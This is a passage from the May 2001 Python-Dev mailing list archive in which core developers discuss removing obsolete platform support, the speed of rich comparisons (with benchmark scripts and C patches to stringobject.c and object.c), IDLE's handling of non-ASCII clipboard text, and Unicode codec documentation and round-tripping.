(yet). If the consensus is that this isn't a big enough issue, in general, to need an official policy, then I vote to pull it out and see if anyone screams. -- Steve Majewski From guido@digicool.com Mon May 14 21:53:26 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 14 May 2001 15:53:26 -0500 Subject: [Python-Dev] deprecated platforms In-Reply-To: Your message of "Mon, 14 May 2001 13:04:56 -0400." References: Message-ID: <200105142053.PAA24202@cj20424-a.reston1.va.home.com> I can't really add much to this discussion, since I have *absolutely* *no* *idea* what kind of framework we're talking about here... I agree with Steve that we shouldn't be too scared of removing support for obsolete platforms. People hanging on to obsolete platforms may as well hang on to obsolete Python versions... --Guido van Rossum (home page: http://www.python.org/~guido/) From martin@loewis.home.cs.tu-berlin.de Mon May 14 20:40:21 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 21:40:21 +0200 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <15103.65486.61021.328424@beluga.mojam.com> (skip@pobox.com) References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> Message-ID: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> > Okay, so I'm completed confused now. I extended the definition of > ECTypeType to include this after the doc string slot: > > (traverseproc)0, /* tp_traverse */ > (inquiry)0, /* tp_clear */ > (richcmpfunc)0, /* rich comparisons */ > 0L, /* weak reference enabler */ > > #ifdef COUNT_ALLOCS > /* these must be last */ > 0, /* tp_alloc */ > 0, /* tp_free */ > 0, /* tp_maxalloc */ > (struct _typeobject *)0, /* tp_next */ > #endif Why did you do that? ECTypeType has the right data type (PyTypeObject). It is the instances of PyExtensionClass that are troubling > When I looked at the definition of ECType, after the doc string I saw > > METHOD_CHAIN(ExtensionClass_methods) > > as Martin indicated. I can't simply insert the same zeroes at the end of > the ECType def'n as I did at the end of the ECTypeType definition. Of course not. ECType is of type PyExtensionClass, not of type PyTypeObject. Those are similar, but not equal. > Where does this METHOD_CHAIN thing go? I looked at the def'n of > struct _typeobject in Include/object.h but didn't see a slot that > looked suitable. Just have a look at ExtensionClass.h instead. > FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested, > I get > > Fatal Python error: UNREF invalid object > > when I run my failing script. This is with and without making any changes > to ECType or ECTypeType. BTW, what version of PyGtk did you try to compile? I've tried the 0.7.0-dont-use, and it can run examples/testgtk without major problems (the example did need some updates, since it is apparently outdated). My Gtk version was 1.2, on Linux. In any case, I think you need to analyse this in a debugger. Regards, Martin From tim@digicool.com Mon May 14 21:12:44 2001 From: tim@digicool.com (Tim Peters) Date: Mon, 14 May 2001 16:12:44 -0400 Subject: [Python-Dev] Comparison speed Message-ID: Here's a simple test program: from time import clock indices = [1] * 100000 def doit(): s = clock() i = 0 while i < 100000: "ab" < "cd" i += 1 f = clock() return f - s for i in xrange(10): print "%.3f" % doit() And here's output from 2.0, 2.1 and current CVS: C:\Code\python\dist\src\PCbuild>\python20\python timech.py 0.107 0.106 0.109 0.106 0.106 0.106 0.106 0.106 0.105 0.106 C:\Code\python\dist\src\PCbuild>\python21\python timech.py 0.118 0.118 0.117 0.118 0.117 0.118 0.117 0.118 0.117 0.118 C:\Code\python\dist\src\PCbuild>python timech.py 0.119 0.117 0.118 0.117 0.118 0.117 0.118 0.117 0.118 So "something happened" between 2.0 and 2.1 to slow this overall by 10%. string_compare hasn't changed, so rich comparisons are a good guess. Note that the more obvious timing loop obscures the issue: def doit(): s = clock() for i in indices: "ab" < "cd" f = clock() return f - s C:\Code\python\dist\src\PCbuild>\python20\python timech.py 0.070 0.069 0.069 0.070 0.069 0.069 0.069 0.070 0.069 0.069 C:\Code\python\dist\src\PCbuild>\python21\python timech.py 0.076 0.076 0.076 0.076 0.076 0.077 0.076 0.076 0.076 0.076 C:\Code\python\dist\src\PCbuild>python timech.py 0.069 0.070 0.070 0.069 0.069 0.070 0.070 0.069 0.070 0.069 for-loops are faster in current CVS than in 2.0 or 2.1, and that cancels out the comparison slowdown. If we try it with a type of comparison that avoids the richcmp machinery (int < int is special-cased in ceval), current CVS is actually faster than 2.0: def doit(): s = clock() for i in indices: 2 < 3 f = clock() return f - s C:\Code\python\dist\src\PCbuild>\python20\python timech.py 0.056 0.056 0.056 0.056 0.055 0.056 0.058 0.058 0.055 0.056 C:\Code\python\dist\src\PCbuild>\python21\python timech.py 0.059 0.059 0.059 0.060 0.060 0.059 0.059 0.060 0.059 0.059 C:\Code\python\dist\src\PCbuild>python timech.py 0.053 0.052 0.052 0.053 0.053 0.052 0.052 0.054 0.052 0.053 C:\Code\python\dist\src\PCbuild> This also shows that 2.1 was a bit more slothful than 2.0 for some reason other than richcmps. These were all done on a Win2K box; timings vary too much on a Win9x box to be useful. Anybody care to take a stab at making the new richcmp and/or coerce code ugly again? speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim From martin@loewis.home.cs.tu-berlin.de Mon May 14 21:34:35 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 22:34:35 +0200 Subject: [Python-Dev] deprecated platforms Message-ID: <200105142034.f4EKYZs05805@mira.informatik.hu-berlin.de> > I'm all for removing it: So am I. There are way too many build options for build Python on the Mac-like systems already (e.g. after that change, you still have --with-dyld - or rather the option of still building .o extensions). If it is clearly broken (even if only on OSX), it should be removed. Anybody interested in the flag would need to make it work correctly before it can be revived. > However, I said I thought there ought to be some sort of official > procedure for removing platform support. I don't think such a procedure is necessary. It is not that any end user would be concerned; building Python is an activity of system administrators. The other PEPs are there because changing the language or removing modules might break *applications* that used to work after an upgrade of Python. With removed platform support, nothing will break - installations would continue to use the last release that did support that platform. Regards, Martin From martin@loewis.home.cs.tu-berlin.de Mon May 14 23:06:57 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 00:06:57 +0200 Subject: [Python-Dev] Comparison speed Message-ID: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> > Anybody care to take a stab at making the new richcmp and/or coerce > code ugly again? When stepping through the code, I also missed support for the relationship between identity and equality. E.g. in PyObject_RichCompare, I'd expect if (v == w) { switch (op) case Py_EQ:case Py_LE:case Py_GE: Py_INCREF(Py_True); return Py_True; case Py_NE:case Py_LT:case Py_GT: Py_INCREF(Py_False); return Py_False; } } That would not help in your case, of course. I don't even know how frequent comparing identical objects is in real life - but this is something that PyObject_Compare has that PyObject_RichCompare currently doesn't. Regards, Martin From martin@loewis.home.cs.tu-berlin.de Mon May 14 22:55:39 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 23:55:39 +0200 Subject: [Python-Dev] Comparison speed Message-ID: <200105142155.f4ELtdM09420@mira.informatik.hu-berlin.de> > Anybody care to take a stab at making the new richcmp and/or coerce > code ugly again? Hi Tim, With CVS Python, 1000000 iterations, and a for loop, I currently got 0.780 0.770 0.770 0.780 0.770 0.770 0.770 0.780 0.770 0.770 With the patch below, I get 0.720 0.710 0.710 0.720 0.710 0.710 0.710 0.720 0.710 0.710 The idea is to let strings support richcmp; this also allows some optimization for the EQ case. Please let me know what you think. Martin Index: stringobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/stringobject.c,v retrieving revision 2.115 diff -u -r2.115 stringobject.c --- stringobject.c 2001/05/10 00:32:57 2.115 +++ stringobject.c 2001/05/14 21:36:36 @@ -596,6 +596,51 @@ return (len_a < len_b) ? -1 : (len_a > len_b) ? 1 : 0; } +/* In the signature, only a is guaranteed to be a PyStringObject. + However, as the first thing in the function, we check that b + is of that type also. */ + +static PyObject* +string_richcompare(PyStringObject *a, PyStringObject *b, int op) +{ + int c; + PyObject *result; + if (!PyString_Check(b)) { + result = Py_NotImplemented; + goto out; + } + if (op == Py_EQ) { + if (a->ob_size != b->ob_size) { + result = Py_False; + goto out; + } +#ifdef CACHE_HASH + if (a->ob_shash != b->ob_shash + && a->ob_shash != -1 + && b->ob_shash != -1) { + result = Py_False; + goto out; + } +#endif + } + c = string_compare(a, b); + switch (op) { + case Py_LT: c = c < 0; break; + case Py_LE: c = c <= 0; break; + case Py_EQ: c = c == 0; break; + case Py_NE: c = c != 0; break; + case Py_GT: c = c > 0; break; + case Py_GE: c = c >= 0; break; + default: + result = Py_NotImplemented; + goto out; + } + result = c ? Py_True : Py_False; + out: + Py_INCREF(result); + return result; +} + static long string_hash(PyStringObject *a) { @@ -2409,6 +2454,12 @@ &string_as_buffer, /*tp_as_buffer*/ Py_TPFLAGS_DEFAULT, /*tp_flags*/ 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + (richcmpfunc)string_richcompare, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ }; void From gstein@lyra.org Mon May 14 23:17:56 2001 From: gstein@lyra.org (Greg Stein) Date: Mon, 14 May 2001 15:17:56 -0700 Subject: [Python-Dev] Comparison speed In-Reply-To: ; from tim@digicool.com on Mon, May 14, 2001 at 04:12:44PM -0400 References: Message-ID: <20010514151755.P1374@lyra.org> On Mon, May 14, 2001 at 04:12:44PM -0400, Tim Peters wrote: >... > Anybody care to take a stab at making the new richcmp and/or coerce code > ugly again? > > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim Euh... isn't Guido's preference for cleanliness over speed? Cheers, -g -- Greg Stein, http://www.lyra.org/ From tim@digicool.com Mon May 14 23:35:33 2001 From: tim@digicool.com (Tim Peters) Date: Mon, 14 May 2001 18:35:33 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <20010514151755.P1374@lyra.org> Message-ID: [Greg Stein] > Euh... isn't Guido's preference for cleanliness over speed? So do both. From greg@cosc.canterbury.ac.nz Tue May 15 02:42:49 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 15 May 2001 13:42:49 +1200 (NZST) Subject: [Python-Dev] Comparison speed In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> Message-ID: <200105150142.NAA18195@s454.cosc.canterbury.ac.nz> "Martin v. Loewis" : > I also missed support for the > relationship between identity and equality. That would severely restrict the semantics that could be given to the comparison operators by overloading them. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From guido@digicool.com Tue May 15 03:40:33 2001 From: guido@digicool.com (Guido van Rossum) Date: Mon, 14 May 2001 21:40:33 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Mon, 14 May 2001 15:17:56 MST." <20010514151755.P1374@lyra.org> References: <20010514151755.P1374@lyra.org> Message-ID: <200105150240.VAA26417@cj20424-a.reston1.va.home.com> > > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim > > Euh... isn't Guido's preference for cleanliness over speed? Yeah, Tim & I have developed a nice good-cop-bad-cop routine about this. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Tue May 15 04:36:42 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 14 May 2001 23:36:42 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > When stepping through the code, I also missed support for the > relationship between identity and equality. E.g. in > PyObject_RichCompare, I'd expect > > if (v == w) { > switch (op) > case Py_EQ:case Py_LE:case Py_GE: > Py_INCREF(Py_True); > return Py_True; > case Py_NE:case Py_LT:case Py_GT: > Py_INCREF(Py_False); > return Py_False; > } > } > > That would not help in your case, of course. I don't even know how > frequent comparing identical objects is in real life - but this is > something that PyObject_Compare has that PyObject_RichCompare > currently doesn't. Guido insisted (with cause ) on these four pairs as being equivalent: x < y iff y > x x <= y y >= x x == y y == x x != y y != x but beyond that, in the presence of rich comparisons, agreed not to make any other assumptions about what those pixel-bags "mean". In particular, there's no implication that "x <= y" iff "x < y or x == y", or that "x < y" implies "x != y", etc. Applying that to the above leaves you with nothing but if (v == w && op == Py_EQ) /* then return Py_True */ Which is about all PyObject_Compare's if (v == w) return 0; assumes too. So I don't see much future in that. [later, a patch to fill in the richcmp slot for strings] > +static PyObject* > +string_richcompare(PyStringObject *a, PyStringObject *b, int op) > +{ > + int c; > + PyObject *result; > + if (!PyString_Check(b)) { > + result = Py_NotImplemented; > + goto out; > + } > + if (op == Py_EQ) { > + if (a->ob_size != b->ob_size) { > + result = Py_False; > + goto out; > + } > +#ifdef CACHE_HASH > + if (a->ob_shash != b->ob_shash > + && a->ob_shash != -1 > + && b->ob_shash != -1) { > + result = Py_False; > + goto out; > + } > +#endif > + } > + c = string_compare(a, b); > + switch (op) { > + case Py_LT: c = c < 0; break; > + case Py_LE: c = c <= 0; break; > + case Py_EQ: c = c == 0; break; > + case Py_NE: c = c != 0; break; > + case Py_GT: c = c > 0; break; > + case Py_GE: c = c >= 0; break; > + default: > + result = Py_NotImplemented; > + goto out; > + } > + result = c ? Py_True : Py_False; > + out: > + Py_INCREF(result); > + return result; [and that yields about an 8% speedup in the "<" case] That looks on the right track, but maybe at the wrong level: why is it necessary? That is, the bulk of the "smarts" here in the switch stmt are type-independent: if there's no specific implementation of individual comparisons, but there is a tp_compare, then the switch stmt applies verbatim to *any* such type. Do we have to fill in the richcmp slot for everything to get Python to realize that? I mean "just about everything", too: while, e.g., ceval special-cases "<" for ints, that doesn't do sorting or max or min etc on ints a lick of good (they don't go thru the COMPARE_OP opcode then, but thru the general comparison routines). The "speed problem" appears to be: + COMPARE_OP calls cmp_outcome() + which calls PyObject_RichCompare() + which calls do_richcmp() + which calls try_rich_compare() (unsuccessfully now, successfully after your patch) which fails to find a richcmp slot on either operand (now) so says "not implemented" + then calls try_3way_to_rich_compare() + which calls try_3way_compare() + which finally calls the tp_compare slot + then runs exactly the same switch (op) { case Py_LT: c = c < 0; break; case Py_LE: c = c <= 0; break; case Py_EQ: c = c == 0; break; case Py_NE: c = c != 0; break; case Py_GT: c = c > 0; break; case Py_GE: c = c >= 0; break; } result = c ? Py_True : Py_False; switch as your patch and things unwind. So we've got 7 function calls there, not even counting calls to PyErr_Occurred() and PyObject_IsTrue(), all to find about 3 machine instructions that actually do the compare . You got an 8% speedup for one type by tricking the switch stmt into appearing 3 calls earlier. What if the implementation were smarter, and did it for *all* relevant types even a call or two before that? I don't see any reason "in principle" that compares couldn't be much faster, and via the usual gimmicks: bigger, smarter functions that remember what they've already determined so don't need to figure it out over and over again, and fast paths to favor common cases at the expense of comparisons from Mars. One thing to note here: the workhorse comparisons are "like strings" in having no *logical* need for richcmps at all; and the objects for which richcmps were introduced were numerical arrays, which can much better afford a longer code path to *find* them (one matrix compare will trigger many vanilla element compares anyway, so even for arrays it's much more important that the *latter* be fast). The code now is approximately backwards in that respect (it takes gobs of work before we even *look* for a cmp now -- indeed, if a type has both cmp and richcmp slots now, and we're doing an explict "cmp" compare, the code now tries to *simulate* cmp first via a long sequence of richcmp calls!). I don't have time to uglify this code, but Python would benefit from it. and-no-matter-what-guido-may-say-ly y'rs - tim From tim.one@home.com Tue May 15 04:50:00 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 14 May 2001 23:50:00 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: Message-ID: [Guido] > Index: spam.c > ... Congratulations! "My other" ISP (MSN) just started tagging suspected spam with "spam" in the subject line, and my mail reader moves that to a special spam folder upon delivery. So far this is the one and only incoming email it's moved. Many solicitations to help foreign nationals move large sums of money out of their country have gotten through, along with a number of intriguing promises that I can easily increase the size of my penis -- like I have any need for either of those . reads-every-spam-he-gets-top-to-bottom-ly y'rs - tim From esr@thyrsus.com Tue May 15 04:53:38 2001 From: esr@thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 23:53:38 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: ; from tim.one@home.com on Mon, May 14, 2001 at 11:50:00PM -0400 References: Message-ID: <20010514235338.C663@thyrsus.com> Tim Peters : > Many solicitations to help foreign nationals move large sums of > money out of their country have gotten through, along with a number of > intriguing promises that I can easily increase the size of my penis -- like I > have any need for either of those . What we should truly fear is the prospect that you might increase the size of your . -- Eric S. Raymond "The state calls its own violence `law', but that of the individual `crime'" -- Max Stirner From uche.ogbuji@fourthought.com Tue May 15 05:26:31 2001 From: uche.ogbuji@fourthought.com (Uche Ogbuji) Date: Mon, 14 May 2001 22:26:31 -0600 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: Message from "Tim Peters" of "Mon, 14 May 2001 23:50:00 EDT." Message-ID: <200105150426.f4F4QVx01531@localhost.local> > [Guido] > > Index: spam.c > > ... > > Congratulations! "My other" ISP (MSN) just started tagging suspected spam > with "spam" in the subject line, and my mail reader moves that to a special > spam folder upon delivery. So far this is the one and only incoming email > it's moved. Many solicitations to help foreign nationals move large sums of > money out of their country have gotten through [...] I thought I was th only one getting all these silly Nigerian scam spams. I figured maybe they saw my name and decided to test on me (though they might more cleverly have figured that a fellow Nigerian would be wise to the game). However, with the (sloppily) bogus headers I've always found on those things, I'm surprised your ISP couldn't sniff them out. Not that it matters. The Eastern Nigerian proverb gets it right. "Once hunters learn to shoot without missing, birds will learn to fly without resting". -- Uche Ogbuji Principal Consultant uche.ogbuji@fourthought.com +1 303 583 9900 x 101 Fourthought, Inc. http://Fourthought.com 4735 East Walnut St, Ste. C, Boulder, CO 80301-2537, USA Software-engineering, knowledge-management, XML, CORBA, Linux, Python From tim.one@home.com Tue May 15 07:28:34 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 15 May 2001 02:28:34 -0400 Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <200105141141.NAA22376@pandora.informatik.hu-berlin.de> Message-ID: [Guido] > Postscript: using cut and paste, I *can* enter "s='äö'" in IDLE at the > Python prompt, both on Linux and on Windows 98. It prints as > '\xe4\xf6' on both systems. What changed? [Martin] > Perhaps the Tcl version? That sounds like the issue that Marc talked > about: Tk behaves differently when text is entered programmatically > (and perhaps through cut-n-paste), as compared to text entered through > the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on > Solaris 8 still gives me the UnicodeError. I don't know which version of Python Guido used. I tried cut-&-paste of s='äö' from his email into the distributed 2.1 IDLE under Win98, and got UnicodeError: ASCII encoding error: ordinal not in range(128) Tk appears to interfere with using the usual Windows ALT+0nnn method of entering funny characters, so unsure what happens then -- but for me it either works fine or does something insane (moves the cursor to the left margin, brings up an IDLE dialog box, etc). If I open the system Character Map utility and copy-&-paste using *that*, I can enter all sorts of stuff without problem: >>> s = "àáâãäåæçèéêëìíîïðñòòóôõö÷øùúûüýþÿ" >>> s '\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef \xf0\xf1\xf2\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' >>> So not all clipboard entries are created equal. Another clue: if I paste the s='äö' snippet from Guido's email into a file opened with Notepad, then immediately copy it again from the Notepad doc, then paste that into Idle, again no problem: >>> s='äö' >>> s '\xe4\xf6' >>> Using a clipboard diagnostic tool I don't understand, when I copy from Notepad these data formats are in the system clipboard: TEXT LOCALE OEMTEXT But when I copy from Guido's email under Outlook 2000, it's DataObject Rich Text Format Rich Text Format Without Objects RTF as Text TEXT UNICODTEXT Ole Private Data LOCALE OEMTEXT Under Character Map, it's Rich Text Format TEXT LOCALE OEMTEXT So perhaps it's not the version of Tk but the source of the data, and that Tk grabs an unfortunate data format (when present) from the clipboard in preference to a fortunate one. the-clipboard-is-a-complex-beast-ly y'rs - tim From martin@loewis.home.cs.tu-berlin.de Tue May 15 07:44:23 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 08:44:23 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de> > Applying that to the above leaves you with nothing but > > if (v == w && op == Py_EQ) /* then return Py_True */ > > [...] So I don't see much future in that. Is this really exactly what Python would guarantee? I'm surprised that x==x would always be true, but x!=x might be true also. In a type where x!=x holds, wouldn't people also want to say that x==x might fail? IOW, I had expected that you'd reduced it to if (v == w && op == Py_EQ) /* then return Py_True */ if (v == w && op == Py_NE) /* then return Py_False */ The one application where this may help is list_contains, in particular when searching a list of interned strings. > You got an 8% speedup for one type by tricking the switch stmt into > appearing 3 calls earlier. What if the implementation were smarter, > and did it for *all* relevant types even a call or two before that? Please have a look at the patch below. Since I made a CVS update since yesterday, I had to readjust the baseline results: 0.790 0.780 0.770 0.780 0.780 0.790 0.780 0.790 0.790 0.790 The patch moves the case "equal types, supporting cmp" to somewhat earlier, just after the attempt to do richcompare. Now I get 0.760 0.770 0.750 0.770 0.750 0.750 0.760 0.760 0.760 0.760 So while there is some saving, this is not as good as implementing richcompare. > I don't see any reason "in principle" that compares couldn't be much > faster, and via the usual gimmicks: bigger, smarter functions that > remember what they've already determined so don't need to figure it > out over and over again, and fast paths to favor common cases at the > expense of comparisons from Mars. I agree "in principle" :-) However, you cannot move the case "equal types, implementing tp_compare" before the case "one of them implements tp_richcompare" without changing the semantics. The change here is what you'd do when you have both richcmp and oldcomp; Python clearly mandates using richcmp. In case this is not obvious (it wasn't to me): UserList will complain about using the deprecated __cmp__, and dictionaries will iterate over their elements differently. Given that richcomp has to be tried first, this patch does the "common case" at the earliest possible time, and with no overhead, except for PyErr_Occurred call. So yes, compares can be much faster, BUT YOU HAVE TO SUPPORT TP_RICHCOMPARE (sorry for shouting). If you think the extra work for type implementors is not acceptable, we can offer a convenience function that everybody implementing tp_compare can put into tp_richcompare. For strings, I would still special-case tp_richcompare: when tracing calls to string_richcompare, I found that most calls with Py_EQ can be decided by checking that the string lengths are not equal. This is all "bigger, faster functions" put to work. Regards, Martin Index: object.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v retrieving revision 2.131 diff -u -r2.131 object.c --- object.c 2001/05/11 03:36:45 2.131 +++ object.c 2001/05/15 06:16:53 @@ -477,16 +477,6 @@ if (PyInstance_Check(w)) return (*w->ob_type->tp_compare)(v, w); - /* If the types are equal, don't bother with coercions etc. */ - if (v->ob_type == w->ob_type) { - if ((f = v->ob_type->tp_compare) == NULL) - return 2; - c = (*f)(v, w); - if (PyErr_Occurred()) - return -2; - return c < 0 ? -1 : c > 0 ? 1 : 0; - } - /* Try coercion; if it fails, give up */ c = PyNumber_CoerceEx(&v, &w); if (c < 0) @@ -590,15 +580,21 @@ -1 if v < w; 0 if v == w; 1 if v > w; + If the object implements a tp_compare function, it returns + whatever this function returns (whether with an exception or not). */ static int do_cmp(PyObject *v, PyObject *w) { int c; + cmpfunc f; c = try_rich_to_3way_compare(v, w); if (c < 2) return c; + if (v->ob_type == w->ob_type + && (f = v->ob_type->tp_compare) != NULL) + return (*f)(v, w); c = try_3way_compare(v, w); if (c < 2) return c; @@ -760,16 +756,9 @@ } static PyObject * -try_3way_to_rich_compare(PyObject *v, PyObject *w, int op) +convert_3way_to_object(int op, int c) { - int c; PyObject *result; - - c = try_3way_compare(v, w); - if (c >= 2) - c = default_3way_compare(v, w); - if (c <= -2) - return NULL; switch (op) { case Py_LT: c = c < 0; break; case Py_LE: c = c <= 0; break; @@ -782,16 +771,46 @@ Py_INCREF(result); return result; } + static PyObject * +try_3way_to_rich_compare(PyObject *v, PyObject *w, int op) +{ + int c; + + c = try_3way_compare(v, w); + if (c >= 2) + c = default_3way_compare(v, w); + if (c <= -2) + return NULL; + return convert_3way_to_object(op, c); +} + +static PyObject * do_richcmp(PyObject *v, PyObject *w, int op) { PyObject *res; + cmpfunc f; + res = try_rich_compare(v, w, op); if (res != Py_NotImplemented) return res; Py_DECREF(res); + + /* If the types are equal, don't bother with coercions etc. + Instances are special-cased in try_3way_compare, since + a result of 2 does *not* mean one value being greater + than the other. */ + if (v->ob_type == w->ob_type + && !PyInstance_Check(v) + && (f = v->ob_type->tp_compare) != NULL) { + int c; + c = (*f)(v, w); + if (PyErr_Occurred()) + return NULL; + return convert_3way_to_object(op, c); + } return try_3way_to_rich_compare(v, w, op); } From tim.one@home.com Tue May 15 08:33:06 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 15 May 2001 03:33:06 -0400 Subject: [Python-Dev] Unicode docs In-Reply-To: <3AFFA23F.248517E3@lemburg.com> Message-ID: I don't know that the Unicode docs need massive work, but the docs that are there simply don't answer the technical questions people have: they're too thin. Let's keep it simple. Contrast the Library manual's: unicode(string[, encoding[, errors]]) Decodes string using the codec for encoding. Error handling is done according to errors. The default behavior is to decode UTF-8 in strict mode, meaning that encoding errors raise ValueError. See also the codecs module. with Andrew's description (from http://www.amk.ca/python/2.0/): unicode(string [, encoding] [, errors]) Creates a Unicode string from an 8-bit string. encoding is a string naming the encoding to use. The errors parameter specifies the treatment of characters that are invalid for the current encoding; passing 'strict' as the value causes an exception to be raised on any encoding error, while 'ignore' causes errors to be silently ignored and 'replace' uses U+FFFD, the official replacement character, in case of any problems. The latter addresses several *fundamental* questions untouched by the former, like whar are the datatypes of the arguments and the result, what values does errors accept, and what do they mean? The first blurb answers some more, like what's the default encoding, and which exception is raised? Neither is complete on its own, but the reference manual should have a complete answer to all such questions. It doesn't have to go on at great length. A round-trip example would be invaluable. If Fred wanted to incorporate a brief overview too, a light rework of Andrew/Moshe's writeup would be an excellent start. From tim.one@home.com Tue May 15 08:47:16 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 15 May 2001 03:47:16 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3AFF9F1B.A1CDD617@lemburg.com> Message-ID: [M.-A. Lemburg] > The problem is: which part would raise the exception -- the > encoder or the decoder ? Since I don't yet use any of this stuff for real, I have no idea: seems mostly a question of pragmatics, and I don't have any feel for how cp875 users would view it. > Here are some more options: > > * sort the items before creating the encoding table from the > decoding one (makes the mapping stable) If users don't care that round-trip can fail silently, fine. > * map keys which have multiple mappings in the encoding table > to None -- this causes their usage to raise an exception > (undefined mapping) If users don't care that they'll get an exception when they try something that can't be round-tripped, fine. Or would this depend on the value of the "errors" argument too? Then it's easier to impose. There's a theme here : I have no idea how important roundtrip is in Unicode Practice, or even that it's a constant across apps and encodings. If I write a codec to map all ASCII consonants to u"k" and vowels to u"a", I wouldn't care that I can't get "love" back from u"kaka" . From mal@lemburg.com Tue May 15 09:19:06 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 10:19:06 +0200 Subject: [Python-Dev] Unicode docs References: Message-ID: <3B00E67A.C5769082@lemburg.com> Tim Peters wrote: > > I don't know that the Unicode docs need massive work, but the docs that are > there simply don't answer the technical questions people have: they're too > thin. As much as I would like to work on this, I simply don't have the time... if someone wants to contribute more detailed docs, though, I'd be glad to review them and answer remaining questions. Note that I will give a talk at the upcoming Bordeaux conference about Python and Unicode. The slides will eventually go online after the conference (in July). BTW, are any python-devs attending the conference (they have some great wine in that part of France ;-) ? -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Tue May 15 09:32:14 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Tue, 15 May 2001 10:32:14 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3B00E98E.1C44FF5@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > The problem is: which part would raise the exception -- the > > encoder or the decoder ? > > Since I don't yet use any of this stuff for real, I have no idea: seems > mostly a question of pragmatics, and I don't have any feel for how cp875 > users would view it. If there are any... that code page dates back to 1996 and is based in the EBCDIC world. > > Here are some more options: > > > > * sort the items before creating the encoding table from the > > decoding one (makes the mapping stable) > > If users don't care that round-trip can fail silently, fine. > > > * map keys which have multiple mappings in the encoding table > > to None -- this causes their usage to raise an exception > > (undefined mapping) > > If users don't care that they'll get an exception when they try something > that can't be round-tripped, fine. Or would this depend on the value of the > "errors" argument too? Then it's easier to impose. The errors argument tells the codecs what to do in case a mapping fails (from codecs.py): The .encode()/.decode() methods may implement different error handling schemes by providing the errors argument. These string values are defined: 'strict' - raise a ValueError error (or a subclass) 'ignore' - ignore the character and continue with the next 'replace' - replace with a suitable replacement character; Python will use the official U+FFFD REPLACEMENT CHARACTER for the builtin Unicode codecs. 'strict' is the default for all operations that deal with auto- conversion. 'ignore' and 'replace' allow silently ignoring the problem. > There's a theme here : I have no idea how important roundtrip is in > Unicode Practice, or even that it's a constant across apps and encodings. If > I write a codec to map all ASCII consonants to u"k" and vowels to u"a", I > wouldn't care that I can't get "love" back from u"kaka" . Round-tripping is obviously very important if you use Unicode as basis for working on text. I don't know about the reasoning behind making cp875 fail the round-trip -- Unicode certainly provides means to make mappings round-trip safe (e.g. by reverting to the private Unicode char. point areas). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one@home.com Tue May 15 10:26:32 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 15 May 2001 05:26:32 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > Is this really exactly what 